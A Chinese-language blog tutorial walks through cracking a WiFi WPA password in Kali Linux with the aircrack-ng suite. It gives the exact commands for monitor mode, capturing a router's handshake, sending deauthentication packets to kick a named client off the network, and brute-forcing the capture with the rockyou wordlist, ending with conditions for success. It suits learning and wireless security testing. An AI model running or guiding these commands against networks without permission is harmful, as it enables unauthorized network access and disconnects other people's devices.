學習在Kali下通過字典破解WiFi的WPA密碼

環境

路由器 、筆記本、無線網卡8187、虛擬機Kali Linux (自帶Aircrack-ng軟體、8187驅動、字典)

基本原理

無線網卡開啟監控模式,向路由器的一個連接設備發送反認證包讓其自動重連,截取握手包,通過字典暴力破解。

大致步驟

1)保證虛擬機能連接到外置網卡

學習在Kali下通過字典破解WiFi的WPA密碼

2)查看無線網卡信息

學習在Kali下通過字典破解WiFi的WPA密碼

3)設置無線網卡為「監控模式」

默認為「管理模式」

學習在Kali下通過字典破解WiFi的WPA密碼

設置「監控模式」

執行:airmon-ng start wlan0

學習在Kali下通過字典破解WiFi的WPA密碼

接口名稱從wlan0變成了wlan0mon

學習在Kali下通過字典破解WiFi的WPA密碼

4)查看可用wifi,選定目標(wxxyy)

學習在Kali下通過字典破解WiFi的WPA密碼

5)抓取路由器的握手包

執行:airodump-ng -c 1 –bssid D8-15-0D-6B-DC-64 -w /usr/local/ wlan0mon

解釋:-c 信道,–bssid 路由器MAC,-w 握手包的保存目錄,以 / 結尾

學習在Kali下通過字典破解WiFi的WPA密碼

選擇38-A4-ED-10-8F-47設備,發送反認證包,讓其斷網並自動重連路由器,以便截獲握手包

6)發送反認證包

新開終端,執行:aireplay-ng -0 2 -a D8-15-0D-6B-DC-64 -c 38-A4-ED-10-8F-47 wlan0mon

解釋:-0 發送包個數,-a 路由器的MAC,-c 接受包的設備

學習在Kali下通過字典破解WiFi的WPA密碼

7)查看是否截獲握手包

學習在Kali下通過字典破解WiFi的WPA密碼

學習在Kali下通過字典破解WiFi的WPA密碼

8)關閉網卡監控模式

執行:airmon-ng stop wlan0mon

9)解壓kali自帶的字典

執行:gzip -d /usr/share/wordlists/rockyou.txt.gz

10)根據字典和握手包暴力破解

執行:aircrack-ng -a2 -b D8-15-0D-6B-DC-64 -w /usr/share/wordlists/rockyou.txt /usr/local/*.cap

解釋:-a2 表示WPA,-b 路由器MAC,-w 字典,最後是握手包

最終花了28分鐘破解出來了:

學習在Kali下通過字典破解WiFi的WPA密碼

測試時,請務必拿已知的密碼到字典文件下grep一下看有沒有,如果沒有,說明字典還不夠強大,可以找一個字典裡面存在的密碼進行測試。

破解成功的前提

1,目標路由器開啟了SSID廣播(默認是開啟的,這是你搜到wifi的前提)

2,當前有一個設備正連接著路由器,或者等待的時間內有設備即將連接(抓取握手包或反認證的前提)

3,未知的密碼包含在你的字典裡面,不然白費周折(強大的字典可能需要好幾天才能遍歷完)

4,你的耐心

PS:研究破解wifi密碼除了能當做一次學習網路的機會,並沒有任何實際意義,不必花費太多精力。